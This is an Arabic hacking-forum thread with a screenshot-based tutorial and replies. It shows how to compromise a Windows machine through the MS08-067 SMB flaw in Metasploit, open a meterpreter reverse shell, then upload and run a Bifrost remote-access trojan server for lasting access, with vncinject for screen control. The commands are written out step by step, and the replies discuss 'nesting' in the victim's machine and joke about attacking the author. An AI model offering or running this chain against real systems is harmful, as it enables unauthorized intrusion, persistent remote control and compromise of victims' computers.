:: vBspiders Professional Network ::

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)
-   MetaSploit (http://www.vbspiders.com/vb/f196.html)
-   -   الإختراق القاتل metasploit+bifrost معا (http://www.vbspiders.com/vb/t14193.html)

punisher77 07-03-2009 12:16 AM

الإختراق القاتل metasploit+bifrost معا
 
وأنا أفكر طرأت لي فكرة لا أعرف إن كانت طرحت بعد المهم هي إختراق الضحية بالميتا ورفع سيرفر بيفروست وكما سأتحدث عن سيطرة الجهاز بإستخدام playoad windows/vncinject
وسأجربها علي جهاز إفتراضي كفانا من الكلام ولنبدأ.

من يرد التجربة علي جهازه فليقم بتحميل vbox أو ليقرأ موضوعي السابق علي هذا الرابط
والشرح سيكون بالصور
الشرح بالفيديو



http://img194.imageshack.us/img194/9...0702183620.png

إضغط علي window وبعد ذلك علي console ستفتح لنا النافذة التالية نكتب show exploits



http://img27.imageshack.us/img27/5264/exploitscmd3.png

ونختار windows/smb/ms08_067_netapi

show payloads

http://img25.imageshack.us/img25/3329/payloads.png

ونختار windows/meterpreter/reverse_tcp

أو نختارها مباشرة كما ف الصورة

http://img16.imageshack.us/img16/7027/setexploit5.png

والآن نقوم بتحديد IP الضحية وهو في هذه الحالة جهازي الإفتراضي RHOST = 192.168.56.101
ولا تنسي أن تضع قم جهازك LHOST =192.168.56.1 لتطبيق الثغرة نكتب exploit وبعد ذلك enter

http://img139.imageshack.us/img139/4...chexploit6.png

كما ترون في الصورة لقد نجحنا في تطبيق الثغرة والدخول لي الجهاز عن طريق port 445

************************************************** **********************

لنري خيارات نكتب help والآن سنقوم برفع السيرفر بالأمر upload -r server.exe c:\
كما في الصورة التالية ولكن قبل تحميل السيرفر يجب نسخه في مجلد
C:\Program Files\****sploit\Framework3

http://img200.imageshack.us/img200/9...oadserver6.png

************************************************** ***********************
بعد رفع السيرفر نشغل برنامج الدوس للضحية بالأوامرالتالية:
use -m process
execute -f cmd.exe -c
interact 3
كما في الصورة حسب رقم channel أو session المفتوح

http://img37.imageshack.us/img37/6270/73006251.png

لتشغيل السيرفر start server.exe

************************************************** ************************

وكما توضح الصورة نجاح تحميل السيرفر

http://img213.imageshack.us/img213/9439/70700213.png

والصور تعبر عن نفسها

http://img190.imageshack.us/img190/6250/30769969.png

شاشة الضحية

http://img197.imageshack.us/img197/482/55987753.png

************************************************** ************************

لتطبيق payload windows/vncinject نقوم بنفس الخطوات السابقة ولكن بإستبدال
payload windows/meterpreter/reverse_tcp
set payload windows/vncinject/reverse_tcp

بتطبيق الثغرة ستفتح لنا الشاشة التالية

http://img269.imageshack.us/img269/1700/11vncinject.png

KΛiSЄЯ-J 07-03-2009 01:55 AM

شكرا عل الموضوع لكن حسب علمي عندك خطأ في الموضوع
set windows/meterpreter/reverse_tcp
تبدل بـ
set windows/vncinject/reverse_tcp

punisher77 07-03-2009 06:23 PM

مشكور لقد تم تصحيح الخطأقتال2

d4rK-h4ck3r 07-04-2009 01:37 PM

مشكور لكن ليش ترفع سيرفر ادا كنت بتعمل vnc inject و تكون متحكم بكامل الجهاز

KΛiSЄЯ-J 07-04-2009 03:27 PM

اقتباس:

المشاركة الأصلية كتبت بواسطة Da®k H@©K3R (المشاركة 49159)
مشكور لكن ليش ترفع سيرفر ادا كنت بتعمل vnc inject و تكون متحكم بكامل الجهاز

حتى تضمن الابقاء على الضحية و تدخل للجهاز متى شئت يعني تعشش بالجهاز

d4rK-h4ck3r 07-04-2009 04:44 PM

اقتباس:

المشاركة الأصلية كتبت بواسطة KΛiSЄЯ-J (المشاركة 49181)
يعني تعشش بالجهاز

حلوة هدي :)

عاشق العناكب 07-04-2009 11:05 PM

حلووووووووووو الموضوووع ويستاااااااااهل التثبيت
مشكوووووووووووور اخي وتقبل مروري
يله سلام

xbedx 07-15-2009 05:51 PM

موضوع رائع سأحاول تجربته

و ان نجحت العملية ستكو ن انت يا punisher77 اول ضحية لي لووللووللوول

مشكور اخي

KaLa$nikoV 07-15-2009 06:18 PM

مشكووووووووور

ابو بدر 07-16-2009 08:56 AM

مشكوووووووووووووووور اخوي على الشرح الرائع
وكنت نااوي ارد من زماان بس كنت مشغوول

simon007 07-16-2009 04:20 PM

مشكوووور أخي

XaRa-XD 07-18-2009 01:51 PM

ونختار windows/smb/ms08_067_netapi

show payloads
http://img27.imageshack.us/img27/5264/exploitscmd3.png


ونختار windows/meterpreter/reverse_tcp

أو نختارها مباشرة كما ف الصورة
http://img16.imageshack.us/img16/7027/setexploit5.png

ارجوا ان توضحوا الصورتين فانا لم افهمهمــ ،،
لانه لايمكن الضغط على
windows/smb/ms08_067_netapi
و
windows/meterpreter/reverse_tcp
ارجوا ان توضحوا لي وشكرا

R.99 07-19-2009 03:01 PM

تشكر أخوي :a15::a15::a15::a15::a15:

p4w 07-19-2009 04:28 PM

مشكور يااخي عاي الموضوع

punisher77 07-22-2009 04:55 PM

مشكور علي الردود كنت مشغولا أخي يجب أن تنسخ الثغرة وتضعها هنا> msf(ms08_067_netapi


الساعة الآن 03:35 AM


[ vBspiders.Com Network ]


SEO by vBSEO 3.6.0